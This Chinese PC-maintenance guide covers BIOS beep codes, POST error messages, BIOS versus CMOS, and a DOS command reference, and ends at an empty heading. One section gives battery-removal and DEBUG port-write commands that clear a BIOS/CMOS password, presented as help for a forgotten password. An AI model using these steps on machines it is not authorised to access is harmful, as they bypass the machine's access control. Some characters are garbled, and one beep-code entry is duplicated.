(9) Core Voltage :CPU内核电压设定。包括1.30V至3.2V间的电压选项。选择项中对电压有一定限制,对2.8V 的 Pentium Ⅱ,电压最高可调至3.2V;对2.0V的Pentium Ⅱ,最高只可调至2.3V。


七、BB是报警的声音

你可以根据报警声音长短,数目来判断问题出在什么地方
AWARD BIOS响铃声的一般含义是:
1短: 系统正常启动。这是我们每天都能听到的,也表明机器没有任何问题。
2短: 常规错误,请进入CMOS Setup,重新设置不正确的选项。
1长1短: RAM或主板出错。换一条内存试试,若还是不行,只好更换主板。
1长2短: 显示器或显示卡错误。
1长3短: 键盘控制器错误。检查主板。
1长9短: 主板Flash RAM或EPROM错误,BIOS损坏。换块Flash RAM试试。
不断地响(长声): 内存条未插紧或损坏。重插内存条,若还是不行,只有更换一条内存。
不停地响: 电源、显示器未和显示卡连接好。检查一下所有的插头。
重复短响: 电源问题。
无声音无显示: 电源问题。


AMI BIOS响铃声的一般含义是:
  1. 一短声,内存刷新失败。内存损坏比较严重,恐怕非得更换内存不可。
  2. 二短声,内存奇偶校验错误。可以进入CMOS设置,将内存Parity奇偶校验选项关掉,即设置为Disabled。不过一般来说,内存条有奇偶校验并且在CMOS设置中打开奇偶校验,这对微机系统的稳定性是有好处的。
  3. 三短声,系统基本内存(第1个64Kb)检查失败。更换内存吧。
  4. 四短声,系统时钟出错。维修或更换主板。
  5. 五短声,CPU错误。但未必全是CPU本身的错,也可能是CPU插座或其它什么地方有问题,如果此CPU在其它主板上正常,则肯定错误在于主板。
  6. 六短声,键盘控制器错误。如果是键盘没插上,那好办,插上就行;如果键盘连接正常但有错误提示,则不妨换一个好的键盘试试;否则就是键盘控制芯片或相关的部位有问题了。
  7. 七短声,系统实模式错误,不能切换到保护模式。这也属于主板的错。
  8. 八短声,显存读/写错误。显卡上的存贮芯片可能有损坏的。如果存贮片是可插拔的,只要找出坏片并更换就行,否则显卡需要维修或更换。
  9. 九短声,ROM BIOS检验出错。换块同类型的好BIOS试试,如果证明BIOS有问题,你可以采用重写甚至热插拔的方法试图恢复。
  10. 十短声,寄存器读/写错误。只能是维修或更换主板。
  11. 十一短声,高速缓存错误。
  12. 如果听不到beep响铃声也看不到屏幕显示,首先应该检查一下电源是否接好,在检修时往往容易疏忽,不接上主板电源就开机测试。其次得看看是不是少插了什么部件,如CPU、内存条等。再次,拔掉所有的有疑问的插卡,只留显示卡试试。最后找到主板上清除(clear)CMOS设置的跳线,清除CMOS设置,让BIOS回到出厂时状态。如果显示器或显示卡以及连线都没有问题,CPU和内存也没有问题,经过以上这些步骤后,微机在开机时还是没有显示或响铃声,那就只能是主板的问题了。


POENIX的BIOS报警声(以前的老板上有许多POENIX的,可现在已经被AWARD收购了)
1短 系统启动正常
1短1短1短 系统加电初始化失败
1短1短2短 主板错误
1短1短3短 CMOS或电池失效
1短1短4短 ROM BIOS校验错误
1短2短1短 系统时钟错误
1短2短2短 DMA初始化失败
1短2短3短 DMA页寄存器错误
1短3短1短 RAM刷新错误
1短3短2短 基本内存错误
1短3短3短 基本内存错误
1短4短1短 基本内存地址线错误
1短4短2短 基本内存校验错误
1短4短3短 EISA时序器错误
1短4短4短 EISA NMI口错误
2短1短1短 前64K基本内存错误
3短1短1短 DMA寄存器错误
3短1短2短 主DMA寄存器错误
3短1短3短 主中断处理寄存器错误
3短1短4短 从中断处理寄存器错误
3短2短4短 键盘控制器错误
3短1短3短 主中断处理寄存器错误
3短4短2短 显示错误
3短4短3短 时钟错误
4短2短2短 关机错误
4短2短3短 A20门错误
4短2短4短 保护模式中断错误
4短3短1短 内存错误
4短3短3短 时钟2错误
4短3短4短 时钟错误
4短4短1短 串行口错误
4短4短2短 并行口错误
4短4短3短 数字协处理器错误


八、开机BIOS语言

开机自检时出现问题后会出现各种各样的英文短句,短句中包含了非常重要的信息,读懂这些信息可以自己解决一些小问题,可是这些英文难倒了一部分朋友,下面是一些常见的BIOS短句的解释,大家可以参考一下。


1.CMOS battery failed

中文:CMOS电池失效。

解释:这说明CMOS电池已经快没电了,只要更换新的电池即可。


2.CMOS check sum error-Defaults loaded

中文:CMOS 执行全部检查时发现错误,要载入系统预设值。

解释:一般来说出现这句话都是说电池快没电了,可以先换个电池试试,如果问题还是没有解决,那么说明CMOS RAM可能有问题,如果没过一年就到经销商处换一块主板,过了一年就让经销商送回生产厂家修一下吧!


3.Press ESC to skip memory test

中文:正在进行内存检查,可按ESC键跳过。

解释:这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试,开机就会执行四次内存测试,当然你也可以按 ESC 键结束内存检查,不过每次都要这样太麻烦了,你可以进入COMS设置后选择BIOS FEATURS SETUP,将其中的Quick Power On Self Test设为Enabled,储存后重新启动即可。


4.Keyboard error or no keyboard present

中文:键盘错误或者未接键盘。

解释:检查一下键盘的连线是否松动或者损坏。


5.Hard disk install failure

中文:硬盘安装失败。

解释:这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好,看看同一根数据线上的两个硬盘的跳线的设置是否一样,如果一样,只要将两个硬盘的跳线设置的不一样即可(一个设为Master,另一个设为Slave)。


6.Secondary slave hard fail

中文:检测从盘失败

解释:可能是CMOS设置不当,比如说没有从盘但在CMOS里设为有从盘,那么就会出现错误,这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当,解决方法参照第5条。


7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)

中文:无法驱动软盘驱动器。

解释:系统提示找不到软驱,看看软驱的电源线和数据线有没有松动或者是接错,或者是把软驱放到另一台机子上试一试,如果这些都不行,那么只好再买一个了,好在软驱还不贵。


8.Hard disk(s) diagnosis fail

中文:执行硬盘诊断时发生错误。

解释:出现这个问题一般就是说硬盘本身出现故障了,你可以把硬盘放到另一台机子上试一试,如果问题还是没有解决,只能去修一下了。


9.Memory test fail

中文:内存检测失败。

解释:重新插拔一下内存条,看看是否能解决,出现这种问题一般是因为内存条互相不兼容,去换一条吧!


10.Override enable-Defaults loaded

中文:当前CMOS设定无法启动系统,载入BIOS中的预设值以便启动系统。

解释:一般是在COMS内的设定出现错误,只要进入COMS设置选择LOAD SETUP DEFAULTS载入系统原来的设定值然后重新启动即可。


11.Press TAB to show POST screen

中文:按TAB键可以切换屏幕显示。

解释:有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面,我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。


12.Resuming from disk,Press TAB to show POST screen

中文:从硬盘恢复开机,按TAB显示开机自检画面)。

解释:这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能,如果我们用Suspend to disk的方式来关机,那么我们在下次开机时就会显示此提示消息。


13.Hareware Monitor found an error,enter POWER MANAGEMENT SETUP for details,Press F1 to continue,DEL to enter SETUP

中文:监视功能发现错误,进入POWER MANAGEMENT SETUP察看详细资料,按F1键继续开机程序,按DEL键进入COMS设置。

解释:有的主板具备硬件的监视功能,可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视,当上述监视功能在开机时发觉有异常情况,那么便会出现上述这段话,这时可以进入COMS设置选择POWER MANAGEMENT SETUP,在右面的**Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常,然后再加以解决。

九、BIOS可以被映射

因为BIOS使用的ROM比我们使用的普通内存RAM要慢很多,所以人们就想出在启动后把BIOS的ROM里面的信息拷贝到我们插的内存条(RAM)里来,提高读取速度,而在RAM里的这些BIOS的信息就叫做BIOS影子内存。

十、BIOS与CMOS区别

   在日常操作和维护计算机的过程中,常常可以听到有关BIOS设置和CMOS设置的一些说法,许多人对BIOS和CMOS经常混为一谈。本文主要阐述对BIOS设置和CMOS设置在基本概念上的区分与联系。   

  BIOS是什么?

  所谓BIOS,实际上就是微机的基本输入输出系统(Basic Input-Output System),其内容集成在微机主板上的一个ROM芯片上,主要保存着有关微机系统最重要的基本输入输出程序,系统信息设置、开机上电自检程序和系统启动自举程序等。

BIOS的功用

  BIOS ROM芯片不但可以在主板上看到,而且BIOS管理功能如何在很大程度上决定了主板性能是否优越。BIOS管理功能主要包括:   

  1. BIOS中断服务程序

  BIOS中断服务程序实质上是微机系统中软件与硬件之间的一个可编程接口,主要用来在程序软件与微机硬件之间实现衔接。例如,DOS和Windows操作系统中对软盘、硬盘、光驱、键盘、显示器等外围设备的管理,都是直接建立在BIOS系统中断服务程序的基础上,而且操作人员也可以通过访问INT 5、INT 13等中断点而直接调用BIOS中断服务程序。   

  2.BIOS系统设置程序

  微机部件配置记录是放在一块可读写的 CMOS RAM 芯片中的,主要保存着系统基本情况、CPU特性、软硬盘驱动器、显示器、键盘等部件的信息。在 BIOS ROM芯片中装有"系统设置程序",主要用来设置CMOS RAM中的各项参数。这个程序在开机时按下某个特定键即可进入设置状态,并提供了良好的界面供操作人员使用。事实上,这个设置CMOS参数的过程,习惯上也称为" BIOS设置"。一旦CMOS RAM芯片中关于微机的配置信息不正确时,轻者会使得系统整体运行性能降低、软硬盘驱动器等部件不能识别,严重时就会由此引发一系统的软硬件故障。

  3. POST上电自检

  微机按通电源后,系统首先由POST(Power On Self Test,上电自检)程序来对内部各个设备进行检查。通常完整的POST自检将包括对 CPU、640K基本内存、 1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘进行测试,一旦在自检中发现问题,系统将给出提示信息或鸣笛警告。   

  4. BIOS系统启动自举程序

  系统在完成 POST自检后, ROM BIOS 就首先按照系统 CMOS设置中保存的启动顺序搜寻软硬盘驱动器及CD-ROM、网络服务器等有效地启动驱动器,读入操作系统引导记录,然后将系统控制权交给引导记录,并由引导记录来完成系统的顺利启动。

  CMOS是什么?

  CMOS(本意是指互补金属氧化物半导体存储嚣,是一种大规模应用于集成电路芯片制造的原料)是微机主板上的一块可读写的RAM芯片,主要用来保存当前系统的硬件配置和操作人员对某些参数的设定。CMOS RAM芯片由系统通过一块后备电池供电,因此无论是在关机状态中,还是遇到系统掉电情况,CMOS信息都不会丢失。

  由于CMOS RAM芯片本身只是一块存储器,只具有保存数据的功能,所以对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留在软盘上的(如IBM的PC/AT机型),使用很不方便。现在多数厂家将CMOS设置程序做到了 BIOS芯片中,在开机时通过按下某个特定键就可进入CMOS设置程序而非常方便地对系统进行设置,因此这种CMOS设置又通常被叫做BIOS设置。

BIOS设置和CMOS设置的区别与联系

  BIOS是主板上的一块EPROM或EEPROM芯片,里面装有系统的重要信息和设置系统参数的设置程序(BIOS Setup程序);CMOS是主板上的一块可读写的RAM 芯片,里面装的是关于系统配置的具体参数,其内容可通过设置程序进行读写。CMOS RAM 芯片靠后备电池供电,即使系统掉电后信息也不会丢失。BIOS与CMOS既相关又不同:BIOS中的系统设置程序是完成CMOS参数设置的手段;CMOS RAM既是BIOS设定系统参数的存放场所,又是 BIOS设定系统参数的结果。因此,完整的说法应该是"通过BIOS设置程序对CMOS参数进行设置"。由于 BIOS和CMOS都跟系统设置密初相关,所以在实际使用过程中造成了BIOS设置和CMOS设置的说法,其实指的都是同一回事,但BIOS与CMOS却是两个完全不同的概念,千万不可搞混淆。

  何时要对BIOS或CMOS进行设置?

  众所周知,进行BIOS或CMOS设置是由操作人员根据微机实际情况而人工完成的一项十分重要的系统初始化工作。在以下情况下,必须进行BIOS或CMOS进行设置:

  1、新购微机

  即使带PnP功能的系统也只能识别一部分微机外围设备,而对软硬盘参数、当前日期、时钟等基本资料等必须由操作人员进行设置,因此新购买的微机必须通过进行CMOS参数设置来告诉系统整个微机的基本配置情况。

  2.新增设备

  由于系统不一定能认识新增的设备,所以必须通过CMOS设置来告诉它。另外,一旦新增设备与原有设备之间发生了IRQ、DMA冲突,也往往需要通过BIOS设置来进行排除。

  3.CMOS数据意外丢失

  在系统后备电池失效、病毒破坏了 CMOS数据程序、意外清除了CMOS参数等情况下,常常会造成CMOS数据意外丢失。此时只能重新进入BIOS设置程序完成新的CMOS参数设置。

  4.系统优化

  对于内存读写等待时间、硬盘数据传输模式、内/外 Cache的使用、节能保护、电源管理、开机启动顺序等参数, BIOS中预定的设置对系统而言并不一定就是最优的,此时往往需要经过多次试验才能找到系统优化的最佳组合。


十一、CMOS密码清除方法

打开机箱,找到主板上的电池,将其与主板的连接断开(就是取下电池喽),此时CMOS将因断电而失去内部储存的一切信息。再将电池接通,合上机箱开机,由于CMOS已是一片空白,它将不再要求你输入密码,此时进入BIOS设置程序,选择主菜单中的"LOAD BIOS DEFAULT"(装入BIOS缺省值)或"LOAD SETUP DEFAULT"(装入设置程序缺省值)即可,前者以最安全的方式启动计算机,后者能使你的计算机发挥出较高的性能。

妙用DEBUG清除CMOS密码

如果你忘记了进入CMOS设置程序的密码,除了可以在主板上使用跳线短接清除的方法外,还可以使用软件清除的方法,下面就来介绍如何在DOS下清除CMOS密码的方法。

在DOS中提供了一个编辑器,就是DEBUG,这是一个非常实用的工具,启动方法是,在DOS命令提示符状态下输入命令:DEBUG、此时即可进入DEBUG编辑界面。

在命令符状态下输入命令后,重新启动电脑即可清除CMOS密码,下面给出五个清除CMOS密码的命令行。

方法一
-o 70 16
-o 71 16
-q
方法二
-o 70 11
-o 71 ff
-q
方法三
-o 70 10
-o 71 10
-q
方法四
-o 70 23
-o 71 34
-q
方法五
-o 70 10
-o 71 ff
-q

方法六
-o 70 90
-o 71 91
-q

十二、DOS命令全集

一)MD——建立子目录

1.功能:创建新的子目录

2.类型:内部命令

3.格式:MD[盘符:][路径名]〈子目录名〉

4.使用说明:

(1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;

(2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。

例:(1)在C盘的根目录下创建名为FOX的子目录;(2)在FOX子目录下再创建USER子目录。

C:、>MD FOX (在当前驱动器C盘下创建子目录FOX)

C:、>MD FOX 、USER (在FOX 子目录下再创建USER子目录)

(二)CD——改变当前目录

1.功能:显示当前目录

2.类型:内部命令

3.格式:CD[盘符:][路径名][子目录名]

4.使用说明:

(1)如果省略路径和子目录名则显示当前目录;

(2)如采用“CD、”格式,则退回到根目录;

(3)如采用“CD.。”格式则退回到上一级目录。

例:(1)进入到USER子目录;(2)从USER子目录退回到子目录;(3)返回到根目录。

C:、>CD FOX 、USER(进入FOX子目录下的USER子目录)

C:、FOX、USER>CD.。 (退回上一级根目录)

C:、FOX>CD、 (返回到根目录)

C:、>

(三)RD——删除子目录命令

1.功能:从指定的磁盘删除了目录。

2.类型:内部命令

3.格式:RD[盘符:][路径名][子目录名]

4.使用说明:

(1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用DEL(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身;



(2)不能删除根目录和当前目录。

例:要求把C盘FOX子目录下的USER子目录删除,操作如下:

第一步:先将USER子目录下的文件删空;

C、>DEL C:、FOX、USER、*。*

第二步,删除USER子目录。

C、>RD C:、FOX、USER

(四)DIR——显示磁盘目录命令

1.功能:显示磁盘目录的内容。

2.类型:内部命令

3.格式:DIR [盘符][路径][/P][/W]

4. 使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Press any key to continue

/W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。


PATH——路径设置命令

1.功能:设备可执行文件的搜索路径,只对文件有效。

2.类型:内部命令

3.格式:PATH[盘符1]目录[路径名1]{[;盘符2:],〈目录路径名2〉…}

4.使用说明:

(1)当运行一个可执行文件时,DOS会先在当前目录中搜索该文件,若找到则运行之;若找不到该文件,则根据PATH命令所设置的路径,顺序逐条地到目录中搜索该文件;

(2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开;

(3)PATH命令有三种使用方法:

PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径)

PATH:(取消所有路径)

PATH:(显示目前所设的路径)

(六)TREE——显示磁盘目录结构命令

1.功能:显示指定驱动器上所有目录路径和这些目录下的所有文件名。

2.类型:外部命令

3.格式:TREE[盘符:][/F][》PRN]

4.使用说明:

(1)使用/F参数时显示所有目录及目录下的所有文件,省略时,只显示目录,不显示目录下的文件;

(2)选用>PRN参数时,则把所列目录及目录中的文件名打印输出。

(七)DELTREE——删除整个目录命令

1.功能:将整个目录及其下属子目录和文件删除。

2.类型:外部命令

3.格式:DELTREE[盘符:]〈路径名〉

4.使用说明:该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除,而且不管文件的属性为隐藏、系统或只读,只要该文件位于删除的目录之下,DELTREE都一视同仁,照删不误。使用时务必小心!!!

五、磁盘操作类命令



(一)FORMAT——磁盘格式化命令

1.功能:对磁盘进行格式化,划分磁道和扇区;同时检查出整个磁盘上有无带缺陷的磁道,对坏道加注标记;建立目录区和文件分配表,使磁盘作好接收DOS的准备。

2.类型:外部命令

3.格式:FORMAT〈盘符:〉[/S][/4][/Q]

4.使用说明:

(1)命令后的盘符不可缺省,若对硬盘进行格式化,则会如下列提示:WARNING:ALL DATA ON NON ——REMOVABLE DISK

DRIVE C:WILL BE LOST !

Proceed with Format (Y/N)?

(警告:所有数据在C盘上,将会丢失,确实要继续格式化吗?)

(2)若是对软盘进行格式化,则会如下提示:Insert mew diskette for drive A;

and press ENTER when ready…

(在A驱中插入新盘,准备好后按回车键)。

(3)选用[/S]参数,将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上,使该磁盘可以做为DOS启动盘。若不选用/S参数,则格式化后的磙盘只能读写信息,而不能做为启动盘;

(4)选用[/4]参数,在1.2MB的高密度软驱中格式化360KB的低密度盘;

(5)选用[/Q]参数,快速格式化,这个参数并不会重新划分磁盘的磁道貌岸然和扇区,只能将磁盘根目录、文件分配表以及引导扇区清成空白,因此,格式化的速度较快。

(6)选用参数,表示无条件格式化,即破坏原来磁盘上所有数据。不加/U,则为安全格式化,这时先建立一个镜象文件保存原来的FAT表和根目录,必要时可用UNFORRMAT恢复原来的数据。

(二)UNFORMAT恢复格式化命令

1.功能:对进行过格式化误操作丢失数据的磁盘进行恢复。


2.类型:外部命令

3.格式:UNFORMAT〈盘符〉[/L][/P][/TEST]

4.使用说明:用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区(包括FAT、根目录、BOOT扇区及硬盘分区表)受损时,也可以用UNFORMAT来抢救。

(1)选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息,但不会真的做FORMAT工作。

(2)选用/P参数将显示于屏幕的报告(包含/L参数所产生的信息)同时也送到打印机。运行时屏幕会显示:“Print out will be sent to LPT1”

(3)选用/TEST参数只做模拟试验(TEST)不做真正的写入动作。使用此参数屏幕会显示:“Simulation only”

(4)选用/U参数不使用MIRROR映像文件的数据,直接根据磁盘现状进行UNFORMAT。

(5)选用/PSRTN;修复硬盘分区表。

若在盘符之后加上/P、/L、/TEST之一,都相当于使用了/U参数,UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。

注意:UNFORMAT对于刚FORMAT的磁盘,可以完全恢复,但FORMAT后若做了其它数据的写入,则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的,由于使用UNFORMAT会重建FAT与根目录,所以它也具有较高的危险性,操作不当可能会扩大损失,如果仅误删了几个文件或子目录,只需要利用UNDELETE就够了。
三) CHKDSK——检查磁盘当前状态命令

1.功能:显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。

2.类型:外部命令

3.格式:CHKDSK [盘符:][路径][文件名][/F][/V]

4.使用说明:

(1)选用[文件名]参数,则显示该文件占用磁盘的情况;

(2)选[/F]参数,纠正在指定磁盘上发现的逻辑错误;

(3)选用[/V]参数,显示盘上的所有文件和路径。

(四)DISKCOPY——整盘复制命令

1.功能:复制格式和内容完全相同的软盘。

2.类型:外部命令

3.格式:DISKCOPY[盘符1:][盘符2:]

4.使用说明:

(1)如果目标软盘没有格式化,则复制时系统自动选进行格式化。

(2)如果目标软盘上原有文件,则复制后将全部丢失。

(3)如果是单驱动器复制,系统会提示适时更换源盘和目标盘,请操作时注意分清源盘和目标盘。

(五)LABEL——建立磁盘卷标命令

1.功能:建立、更改、删除磁盘卷标。

2.类型:外部命令

3.格式:LABEL[盘符:][卷标名]

4.使用说明:

(1)卷标名为要建立的卷标名,若缺省此参数,则系统提示键入卷标名或询问是否删除原有的卷标名;

(2)卷标名由1至11个字符组成。

(六)VOL——显示磁盘卷标命令

1.功能:查看磁盘卷标号。

2.类型:内部命令

3.格式:VOL[盘符:]

4.使用说明:省略盘符,显示当前驱动器卷标。

(七)SCANDISK——检测、修复磁盘命令

1.功能:检测磁盘的FAT表、目录结构、文件系统等是否有问题,并可将检测出的问题加以修复。

2.类型:外部命令



3.格式:SCANDISK[盘符1:]{[盘符2:]…}[/ALL]

4.使用说明:

(1)CCANDISK适用于硬盘和软盘,可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘;

(2)可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误,并加以修复。

(八)DEFRAG——重整磁盘命令

1.。功能:整理磁盘,消除磁盘碎块。

2.类型:外部命令

3.格式:DEFRAG[盘符:][/F]

4.使用说明:选用/F参数,将文件中存在盘上的碎片消除,并调整磁盘文件的安排,确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。

(九)SYS——系统复制命令

1.功能:将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。

2.类型:外部命令

3.格式:SYS[盘符:]

*使用说明:如果磁盘剩余空间不足以存放系统文件,则提示:No roomfor on destination disk.


文件操作类命令

(一) COPY文件复制命令

1.功能:拷贝一个或多个文件到指定盘上。

2.类型:内部命令

3.格式:COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]

4.使用说明:

(1)COPY是文件对文件的方式复制数据,复制前目标盘必须已经格式化;

(2)复制过程中,目标盘上相同文件名称的旧文件会被源文件取代;

(3)复制文件时,必须先确定目标般有足够的空间,否则会出现;insufficient的错误信息,提示磁盘空间不够;

(4)文件名中允许使用通配举“*”“?”,可同时复制多个文件;

(5)COPY命令中源文件名必须指出,不可以省略。

(6)复制时,目标文件名可以与源文件名相同,称作“同名拷贝”此时目标文件名可以省略;

(7)复制时,目标文件名也可以与源文件名不相同,称作“异名拷贝”,此时,目标文件名不能省略;

(8)复制时,还可以将几个文件合并为一个文件,称为“合并拷贝”,格式如下:COPY;[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉;

(9)利用COPY命令,还可以从键盘上输入数据建立文件,格式如下:COPY CON [盘符:][路径]〈文件名〉;

(10)注意:COPY命令的使用格式,源文件名与目标文件名之间必须有空格!

(二)XCOPY——目录复制命令

1.功能:复制指定的目录和目录下的所有文件连同目录结构。

2.类型:外部命令

3.格式:XCOPY [源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E]

4.使用说明:



(1)XCOPY是COPY的扩展,可以把指定的目录连文件和目录结构一并拷贝,但不能拷贝隐藏文件和系统文件;

(2)使用时源盘符、源目标路径名、源文件名至少指定一个;

(3)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;

(4)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。

(三)TYPE——显示文件内容命令

1.功能:显示ASCII码文件的内容。

2.类型:内部命令。

3.格式:TYPE[盘符:][路径]〈文件名〉

4.使用说明:

(1)显示由ASCII码组成的文本文件,对。EXE.COM等为扩展名的文件,其显示的内容是无法阅读的,没有实际意义2;

(2)该命令一次只可以显示一个文件的内容,不能使用通配符;

(3)如果文件有扩展名,则必须将扩展名写上;

(4)当文件较长,一屏显示不下时,可以按以下格式显示;TYPE[盘符:][路径]〈文件名〉|MORE,MORE为分屏显示命令,使用些参数后当满屏时会暂停,按任意键会继续显示。

(5)若需将文件内容打印出来,可用如下格式:

TYPE[盘符:][路径]〈文件名〉,>PRN

此时,打印机应处于联机状态。

(四) REN——文件改名命令

1.功能:更改文件名称

2.类型:内部命令

3.格式:REN[盘符:][路径]〈旧文件名〉〈新文件名〉

4.使用说明:

(1)新文件名前不可以加上盘符和路径,因为该命令只能对同一盘上的文件更换文件名;

(2)允许使用通配符更改一组文件名或扩展名。

(五)FC——文件比较命令

1.功能:比较文件的异同,并列出差异处。


2.类型:外部命令

3.格式:FC[盘符:][路径名]〈文件名〉[盘符:][路径名][文件名][/A][/C][/N]

4.使用说明:

(1)选用/A参数,为ASCII码比较模式;

(2)选用/B参数,为二进制比较模式;

(3)选用/C参数,将大小写字符看成是相同的字符。

(4)选用/N参数,在ASCII码比较方式下,显示相异处的行号。

(六)ATTRIB——修改文件属性命令

1.功能:修改指定文件的属性。(文件属性参见2.5.4(二)文件属性一节)

2.类型:外部命令。

3.格式:ATTRIB[文件名][R][——R][A][——A][H][——H][S][——S][/S]

4.使用说明:

(1)选用R参数,将指定文件设为只读属性,使得该文件只能读取,无法写入数据或删除;选用——R参数,去除只读属性;

(2)选用A参数,将文件设置为档案属性;选用——A参数,去除档案属性;

(3)选用H参数,将文件调协为隐含属性;选用——H参数,去隐含属性;

(4)选用S参数,将文件设置为系统属性;选用——S参数,去除系统属性;

(5)选用/S参数,对当前目录下的所有子目录及作设置。



七) DEL——删除文件命令

1.功能:删除指定的文件。

2.类型:内部命令

3.格式:DEL[盘符:][路径]〈文件名〉[/P]

4.使用说明:

(1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除;

(2)该命令不能删除属性为隐含或只读的文件;

(3)在文件名称中可以使用通配符;

(4)若要删除磁盘上的所有文件(DEL*·*或DEL·),则会提示:(Arey ou sure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业。

(八) UNDELETE——恢复删除命令

1.功能:恢复被误删除命令

2.类型:外部命令。

3.格式:UNDELETE[盘符:][路径名]〈文件名〉[/DOS]/LIST][/ALL]

4.使用说明:使用UNDELETE可以使用“*”和“?”通配符。

(1)选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时,目录所记载斩文件名第一个字符会被改为E5,DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件,所以,UNDELETE会要求用户输入一个字符,以便将文件名字补齐。但此字符不必和原来的一样,只需符合DOS的文件名规则即可。

(2)选用/LIST只“列出”符合指定条件的文件而不做恢复,所以对磁盘内容完全不会有影响。

(3)选用/ALL自动将可完全恢复的文件完全恢复,而不一一地询问用户,使用此参数时,若UNDELTE利用目录里残留的记录来将文件恢复,则会自动选一个字符将文件名补齐,并且使其不与现存文件名相同,选用字符的优选顺序为:#%——0000123456789A~Z。



UNDELETE还具有建立文件的防护措施的功能,已超出本课程授课范围,请读者在使用些功能时查阅有关DOS手册。

七、其它命令

(一)CLS——清屏幕命令

1功能:清除屏幕上的所有显示,光标置于屏幕左上角。

2类型:内部命令

3格式:CLS

(二) VER查看系统版本号命令

1功能:显示当前系统版本号

2类型:内部命令

3格式:VER

(三) DATA日期设置命令

1功能:设置或显示系统日期。

2类型:内部命令

3格式:DATE[mm——dd——yy]

4使用说明:

(1)省略[mm——dd——yy]显示系统日期并提示输入新的日期,不修改则可直接按回车键,[mm——dd——yy]为“月月——日日——年年”格式;

(2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。

(四) TIME系统时钟设置命令

1功能:设置或显示系统时期。

2类型:内部命令

3格式:TIME[hh:mm:ss:xx]

4使用说明:

(1)省略[hh:mm:ss:xx],显示系统时间并提示输入新的时间,不修改则可直接按回车键,[hh:mm:ss:xx]为“小时:分钟:秒:百分之几秒”格式;

(2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。

(五)MEM查看当前内存状况命令

1功能:显示当前内存使用的情况

2类型:外部命令

3格式:MEM[/C][/F][/M][/P]

4使用说明:

(1)选用/C参数列出装入常规内存和CMB的各文件的长度,同时也显示内存空间的使用状况和最大的可用空间;

(2)选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小;


(3)选用/M参数显示该模块使用内存地地址、大小及模块性质;

(4)选用/P参数指定当输出超过一屏时,暂停供用户查看。

(六) MSD显示系统信息命令

1功能:显示系统的硬件和操作系统的状况。

2类型:外部命令

3格式:MSD[/S]

4使用说明:

(1)选用/I参数时,不检测硬件;

(2)选用/B参数时,以黑白方式启动MSD;

(3)选用/S参数时,显示出简明的系统报告。


十三、在DOS下安装Win XP


在Win 98的DOS状态下可以安装Win XP,插入Win XP光盘后,首先从开始中进入MS-DOS,然后在MS-DOS下输入“G:\Setup.exe”(G为光驱盘符)即可。

  如果想从纯DOS下进行安装,可用启动盘启动到DOS状态,安装时首先加载Smartdrv.exe(将Win 98安装光盘或Win 98系统的Windows目录中的Smartdrv.exe拷贝到启动盘上,在DOS提示符下执行Smartdrv.exe即可加载),然后运行/i386目录下的winnt.exe即可。

十四、在DOS中使用系统还原工具

  在系统上电自检声响后,Windows欢迎屏幕出现之前按下F8键,接着在菜单中选择Safe Mode with Command Prompt,然后使用管理员身份登录,在命令行提示符后输入:%systemroot%\ system32\restore\rstrui.exe,回车后跟随屏幕上的向导将系统恢复到以前的正常状态。

十五、Explorer.exe程序在系统中的作用

